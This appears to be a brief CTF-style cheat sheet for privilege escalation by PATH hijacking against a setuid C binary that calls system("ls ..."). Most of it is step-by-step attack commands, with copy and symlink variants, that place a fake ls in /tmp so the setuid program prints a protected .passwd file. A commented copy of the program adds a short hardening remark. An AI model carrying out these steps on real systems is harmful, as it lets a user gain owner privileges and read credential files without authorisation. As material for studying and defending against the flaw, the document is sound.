# base program
int main(void){
system("ls /path/to/.passwd");return 0;}
# As long as the program is executed with the 's' flag (owner rights), you can privesc by copying the program that will impersonate `ls`: system() resolves the bare name `ls` through the caller-controlled PATH
cp /bin/cat /tmp/ls
PATH=/tmp
# You can escape options
echo '#!/bin/cat --' > /tmp/ls
chmod 755 /tmp/ls
env PATH=/tmp ./binary_setuid .passwd
Symbolic link attack
# base program
/*
 * Base program used by the demonstration on this page.
 *
 * Weakness: system() passes its string to the shell, and the shell looks up
 * the bare name "ls" through the PATH inherited from whoever starts the
 * program. The command that runs is therefore whichever "ls" comes first in
 * the caller's PATH, executed with the privileges this process holds.
 *
 * Hardening: invoke the tool by absolute path via execve() with a fixed,
 * minimal environment rather than system(), or drop privileges before
 * running any external command.
 */
int main(void)
{
    const char *listing_cmd = "ls /path/to/.passwd";

    system(listing_cmd);    /* return value of system() is not checked */
    return 0;
}
ln -s /bin/cat /tmp/ls
ls -l /tmp/ls
PATH=/tmp
echo $PATH
./binary1